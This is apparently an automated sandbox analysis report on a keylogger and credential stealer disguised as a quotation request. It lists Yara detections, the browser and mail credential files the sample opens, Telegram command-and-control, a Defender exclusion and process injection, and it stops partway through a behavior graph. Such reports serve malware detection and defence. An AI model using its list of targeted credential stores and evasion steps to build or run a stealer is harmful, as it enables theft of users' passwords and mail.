Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560113 Sample: Request for Quotation MK FM... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 13 other signatures 2->68 8 Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe 7 2->8         started        12 NuDUTBObHpKADz.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...38uDUTBObHpKADz.exe, PE32 8->38 dropped 40 C:\...40uDUTBObHpKADz.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp8B51.tmp, XML 8->42 dropped 44 Request for Quotat...4.11.21.bat.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 74 Multi AV Scanner detection for 